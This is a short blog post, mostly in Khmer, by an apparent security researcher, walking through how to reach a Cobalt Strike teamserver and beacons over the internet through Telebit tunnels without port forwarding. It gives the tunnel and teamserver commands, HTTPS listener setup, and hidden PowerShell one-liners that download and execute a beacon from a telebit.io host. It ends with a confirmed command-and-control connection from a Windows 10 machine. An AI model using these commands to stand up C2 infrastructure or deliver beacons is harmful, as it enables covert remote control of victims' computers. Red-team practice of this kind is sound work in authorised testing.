This page looks best with JavaScript enabled

CobaltStrike Over WAN Connection

 ·  β˜• 1 min read  ·  🐱 thik

αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž“αŸαŸ‡αž‡αžΆαž‚αŸ†αž“αž·αžαž•αŸ’αž‘αžΆαž›αŸ‹αžαŸ’αž›αž½αž“αž€αŸ’αž“αž»αž„αž€αžΆαžšαžαž—αŸ’αž‡αžΆαž”αŸ‹ Teamserver αž“αž·αž„αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžαžΆαž˜αžšαž™αŸˆ Beacons αž–αžΈαž…αŸ†αž„αžΆαž™αžŠαŸ„αž™αž˜αž·αž“αž…αžΆαŸ†αž”αžΆαž…αŸ‹αž”αžΎαž€ Port Forwarding αŸ”

Requirements

  • CobaltStrike
  • Telebit

Telebit Setup

αž…αŸ†αžŽαžΆαŸ†αŸ– αž…αžΌαž›αž‘αŸ…αž€αžΆαž“αŸ‹ telebit.cloud αžŠαžΎαž˜αŸ’αž”αžΈαž™αž›αŸ‹αžŠαžΉαž„αž”αž“αŸ’αžαŸ‚αž˜αž’αŸ†αž–αžΈ Configuration αŸ”

αž“αŸ…αž€αŸ’αž“αž»αž„αž›αžΈαž“αž»αž…αžŸαžΌαž˜αž”αžΎαž€αž•αŸ’αž‘αžΆαŸ†αž„ Terminal αžšαž½αž…αžœαžΆαž™αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžŠαžΌαžαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1
2

// Install Telebit
curl https://get.telebit.io/ | bash

Install Telebit

αž€αŸ’αžšαŸ„αž™αž–αžΈαž”αŸ†αž–αŸαž‰αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“ Email αžšαž½αž…αžŸαžΌαž˜αž…αžΌαž›αž‘αŸ…αž€αžΆαž“αŸ‹αž•αŸ’αž‘αžΆαŸ†αž„ Inbox αžšαž½αž…αž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαžŠαŸ†αžŽαž—αŸ’αž‡αžΆαž”αŸ‹αžŠαŸ‚αž›αž‚αŸαž”αžΆαž“αž•αŸ’αž‰αžΎαž˜αž€ αž“αž·αž„αž…αž˜αŸ’αž›αž„αž…αžΌαž›αž“αžΌαžœαž›αŸαžαž‘αžΆαŸ†αž„ ៀ αžαŸ’αž‘αž„αŸ‹αž“αŸ„αŸ‡αžŠαžΎαž˜αŸ’αž”αžΈαž•αŸ’αž‘αŸ€αž„αž•αŸ’αž‘αžΆαžαŸ‹ αŸ”

Verify Code

Verified

αž”αŸ’αžšαžŸαž·αž“αž”αžΎαž˜αž·αž“αž˜αžΆαž“αž’αŸ’αžœαžΈαžαž»αžŸαž†αŸ’αž‚αž„αž‘αŸ αž™αžΎαž„αž“αžΉαž„αž‘αž‘αž½αž›αž”αžΆαž“αžŸαžΆαžšαž”αž‰αŸ’αž‡αžΆαž€αŸ‹αž–αžΈαž—αžΆαž–αž‡αŸ„αž‚αž‡αŸαž™αžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

Usage

Usage

αžαžŸαŸ‹! αž₯αž›αžΌαžœαž…αžΆαž”αŸ‹αž•αŸ’αžŠαžΎαž˜αž’αŸ’αžœαžΎαž€αžΆαžšαž€αŸ†αžŽαžαŸ‹αž“αŸ…αž›αŸαž Port αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αžαž—αŸ’αž‡αžΆαž”αŸ‹αž‘αŸ…αž€αžΆαž“αŸ‹ Teamserver αž“αž·αž„ Beacons

1
2
3
4
5

// Setup Teamserver Port
~/telebit tcp 50050

// Setup HTTP Beacon
~/telebit http 80 //don't change the port

Teamserver/Beacon Setup

Teamserver Connection

αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αžŸαžΌαž˜αžœαžΆαž™αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αžŠαžΎαž˜αŸ’αž”αžΈαž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš Teamserver

1

sudo ./teamserver x.x.x.x your_password

Start Teamserver

αžŠαžΌαž…αŸ’αž“αŸαŸ‡αž™αžΎαž„αžŸαžΆαž€αž›αŸ’αž”αž„αžαž—αŸ’αž‡αžΆαž”αŸ‹ Teamserver αžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž›αŸαžαž’αžΆαž™αž—αžΈαžšαž”αžŸαŸ‹ telebit.cloud αžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

Connect To Teamserver

αžŸαžΌαž˜αž²αŸ’αž™αž”αŸ’αžšαžΆαž€αžŠαžαžΆαž›αŸαžαž’αžΆαž™αž—αžΈ (αž’αžΆαž… ping αž…αŸαž‰αž–αžΈ telebit.cloud) αž›αŸαžαž…αŸ’αžšαž€ (Port) αž“αž·αž„ αž›αŸαžαžŸαŸ†αž„αžΆαžαŸ‹αž‚αžΊαžαŸ’αžšαžΉαž˜αžαŸ’αžšαžΌαžœαž˜αž»αž“αž“αž·αž„αž…αž»αž…αžαž—αŸ’αž‡αžΆαž”αŸ‹αŸ”

CobaltStrike Connected

αž‡αŸ„αž‚αž‡αŸαž™! αž₯αž›αžΌαžœαž“αŸαŸ‡αž™αžΎαž„αž”αžΆαž“αžαž—αŸ’αž‡αžΆαž”αŸ‹ Teamserver αž”αžΆαž“αžŸαž˜αŸ’αžšαŸαž…αŸ”

Adding HTTP/HTTPS Listener

αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž“αŸαŸ‡αž‡αžΆαžœαž·αž’αžΈαž€αŸ’αž“αž»αž„αž€αžΆαžšαž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš Listener αž–αžΈαž…αŸ†αž„αžΆαž™αžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ Protocol αž”αŸ’αžšαž—αŸαž‘ HTTPαŸ”

HTTP Listener

αžŠαŸ„αž™αžŸαžΆαžšαžαŸ‚ Telebit αžαŸ’αžšαžΌαžœαž”αžΆαž“ Redirect αž‘αŸ…αž€αžΆαž“αŸ‹ Protocol αž”αŸ’αžšαž—αŸαž‘ HTTPS αžŠαžΌαž…αž“αŸαŸ‡αž™αžΎαž„αž€αŸαžαŸ’αžšαžΌαžœαžαŸ‚αž”αžΎαž€ Listener αž‡αžΆαž”αŸ’αžšαž—αŸαž‘ HTTPS αž˜αž½αž™αž‘αŸ€αžαŸ”

αžŸαžΌαž˜αž’αŸ’αžœαžΎαž€αžΆαžšαž”αžΎαž€ HTTPS Listener αžŠαžΌαž…αž”αžΆαž“αž”αž„αŸ’αž αžΆαž‰αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

HTTPS Listener

Generate Beacon

αž€αžΆαžšαž€αŸ†αžŽαžαŸ‹αžαžΆαž„αž›αžΎαžšαž½αž…αžšαžΆαž›αŸ‹αž’αžŸαŸ‹αž αžΎαž™ αžŠαžΌαž…αž“αŸαŸ‡αž™αžΎαž„αž’αžΆαž…αžŸαžΆαž€αž›αŸ’αž”αž„αž”αž„αŸ’αž€αžΎαž Beacon αžŠαžΎαž˜αŸ’αž”αžΈαžαž—αŸ’αž‡αžΆαž”αŸ‹αŸ”
αž“αŸ…αž€αŸ’αž“αž»αž„αž€αžΆαžšαž”αž„αŸ’αž αžΆαž‰αž“αŸαŸ‡αž™αžΎαž„αž“αž·αž„αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž”αŸ‚αž” Scripted Web Delivery αŸ”

HTTP Beacon

αž…αŸ†αžŽαžΆαŸ†αŸ– αž“αŸ…αž–αŸαž›αžŠαŸ‚αž›αž”αžΆαž“αž”αž„αŸ’αž€αžΎαžαžšαž½αž…αžŸαžΌαž˜αž’αŸ’αžœαžΎαž€αžΆαžšαž€αŸ‚αž”αŸ’αžšαŸ‚αž“αŸ…αž•αŸ’αž“αŸ‚αž€αž˜αž½αž™αž…αŸ†αž“αž½αž“αžŠαžΌαž…αž‡αžΆαž”αŸ’αžšαž—αŸαž‘ Protocol αž“αž·αž„ Port αžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1
2
3
4
5

// By default it will download from port 80 without https
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://shy-impala-40.telebit.io:80/foo'))"

// Then we have to remove the port and add https instead
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://shy-impala-40.telebit.io/foo'))"

Execute

αž™αžΎαž„αž”αžΆαž“αžŸαžΆαž€αž›αŸ’αž”αž„αž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž“αŸ…αž€αŸ’αž“αž»αž„αžœαžΈαž“αžŠαžΌ ៑០ αž”αŸ’αžšαž—αŸαž‘ Pro x64 Bit αžŠαžΌαž…αžšαžΌαž”αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

Exec Powershell

αž”αŸ’αžŠαžΌαž‘αŸ…αž˜αžΎαž›αž•αŸ’αž‘αžΆαŸ†αž„αž‚αŸ’αžšαž”αŸ‹αž‚αŸ’αžšαž„ CobaltStrike αž™αžΎαž„αž“αžΉαž„αž‘αž‘αž½αž›αž”αžΆαž“αž€αžΆαžšαžαž—αŸ’αž‡αžΆαž”αŸ‹ Beacon αž–αžΈαžœαžΈαž“αžŠαžΌ ៑០ αž“αŸ„αŸ‡αŸ•

C2 Connected

Share on
Thik
WRITTEN BY
thik
Security Researcher